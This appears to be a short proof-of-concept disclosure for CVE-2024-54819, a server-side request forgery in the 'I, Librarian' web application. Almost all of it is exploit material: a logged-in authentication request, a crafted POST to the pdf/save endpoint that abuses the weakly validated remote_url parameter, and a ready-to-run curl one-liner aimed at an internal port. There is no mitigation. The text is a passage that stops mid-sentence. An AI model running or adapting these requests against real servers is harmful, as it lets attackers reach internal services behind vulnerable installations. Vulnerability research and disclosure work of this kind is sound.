Read more details on: https://www.partywave.site about CVE-2024-54819
The attacker must be logged
POST /librarian/index.php/authentication HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 110
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]
username=[USERNAME]&password=[PASSWORD]&csrfToken=[CSRF_TOKEN]remote_url parameter is vulnerable to its weak validation
POST /librarian/index.php/pdf/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 135
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/index.php/item
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]
remote_url=[PAYLOAD]&id=[PDF_ID]&csrfToken=[CSRF_TOKEN]This one-liner is an example with example values to exploit the Server Side Request Forgery:
curl -X POST http://127.0.0.1/librarian/index.php/pdf/save -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: IL=rcidrisa6hukk5amtmol06b0if" --data-urlencode "remote_url=http://0:6565" --data-urlencode "id=2" --data-urlencode "csrfToken=f3aa558cc79ebf4c48ee042ad61aeaebdf9e9a52b44c64174de398f4f46959df" --proxy http://127.0.0.1:8080
And
